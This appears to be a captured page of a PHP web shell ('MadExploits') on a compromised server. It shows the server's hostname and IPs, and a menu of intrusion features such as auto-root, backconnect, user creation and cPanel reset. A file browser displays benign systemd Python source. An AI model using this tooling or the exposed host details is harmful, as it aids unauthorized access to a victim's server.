Linux server.nvwebsoft.co.in 3.10.0-1160.114.2.el7.x86_64 #1 SMP Wed Mar 20 15:54:52 UTC 2024 x86_64
Apache
: 162.240.12.249 | : 18.190.239.189
202 Domain
8.1.31
nbspublicschool
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
lib64 /
python2.7 /
site-packages /
systemd /
[ HOME SHELL ]
Name
Size
Permission
Action
__init__.py
771
B
-rw-r--r--
__init__.pyc
141
B
-rw-r--r--
__init__.pyo
141
B
-rw-r--r--
_daemon.so
28.91
KB
-rwxr-xr-x
_journal.so
11.05
KB
-rwxr-xr-x
_reader.so
52.24
KB
-rwxr-xr-x
daemon.py
1.64
KB
-rw-r--r--
daemon.pyc
2.42
KB
-rw-r--r--
daemon.pyo
2.42
KB
-rw-r--r--
id128.so
27.82
KB
-rwxr-xr-x
journal.py
19.95
KB
-rw-r--r--
journal.pyc
21.89
KB
-rw-r--r--
journal.pyo
21.89
KB
-rw-r--r--
login.so
30.33
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : daemon.py
from ._daemon import (__version__, booted, notify, _listen_fds, _is_fifo, _is_socket, _is_socket_inet, _is_socket_unix, _is_mq, LISTEN_FDS_START) from socket import AF_UNSPEC as _AF_UNSPEC def _convert_fileobj(fileobj): try: return fileobj.fileno() except AttributeError: return fileobj def is_fifo(fileobj, path=None): fd = _convert_fileobj(fileobj) return _is_fifo(fd, path) def is_socket(fileobj, family=_AF_UNSPEC, type=0, listening=-1): fd = _convert_fileobj(fileobj) return _is_socket(fd, family, type, listening) def is_socket_inet(fileobj, family=_AF_UNSPEC, type=0, listening=-1, port=0): fd = _convert_fileobj(fileobj) return _is_socket_inet(fd, family, type, listening, port) def is_socket_unix(fileobj, type=0, listening=-1, path=None): fd = _convert_fileobj(fileobj) return _is_socket_unix(fd, type, listening, path) def is_mq(fileobj, path=None): fd = _convert_fileobj(fileobj) return _is_mq(fd, path) def listen_fds(unset_environment=True): """Return a list of socket activated descriptors Example:: (in primary window) $ systemd-activate -l 2000 python3 -c \\ 'from systemd.daemon import listen_fds; print(listen_fds())' (in another window) $ telnet localhost 2000 (in primary window) ... Execing python3 (...) [3] """ num = _listen_fds(unset_environment) return list(range(LISTEN_FDS_START, LISTEN_FDS_START + num))
Close